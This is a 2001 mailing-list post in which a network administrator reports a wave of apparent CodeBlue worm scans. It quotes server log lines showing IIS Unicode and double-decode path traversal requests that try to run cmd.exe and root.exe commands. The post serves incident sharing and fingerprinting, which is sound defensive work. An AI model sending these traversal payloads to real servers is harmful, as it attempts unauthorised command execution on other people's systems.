Security Incidents mailing list archives

CodeBlue finally hitting, or what?

From: "Portnoy, Gary" <gportnoy () belenosinc com>
Date: Tue, 18 Sep 2001 10:24:00 -0400

Greetings,

I am suddenly seeing hundreds of Unicode traversal requests coming in from
all over the world, many of them from previous CodeRed victims.  I am
guessing someone changed CodeBlue to make it spread faster, because before I
saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least 20
in the last hour.  Just a a way to help fingerprint it, a few of the
attempted exploits use the multiple decode vulnerability....

-Gary-

12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 287 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 285 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 326 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 326 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
"-"
12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"

Gary Portnoy
Network Administrator
gportnoy () belenosinc com

PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

CodeBlue finally hitting, or what? Portnoy, Gary (Sep 18)
- Re: CodeBlue finally hitting, or what? Eric Jacobsen (Sep 18)
- Re: CodeBlue finally hitting, or what? Jason Giglio (Sep 18)
- Re: CodeBlue finally hitting, or what? Tracey Losco (Sep 18)
- Re: CodeBlue finally hitting, or what? Nick FitzGerald (Sep 18)
- <Possible follow-ups>
- RE: CodeBlue finally hitting, or what? Becky Pinkard (Sep 18)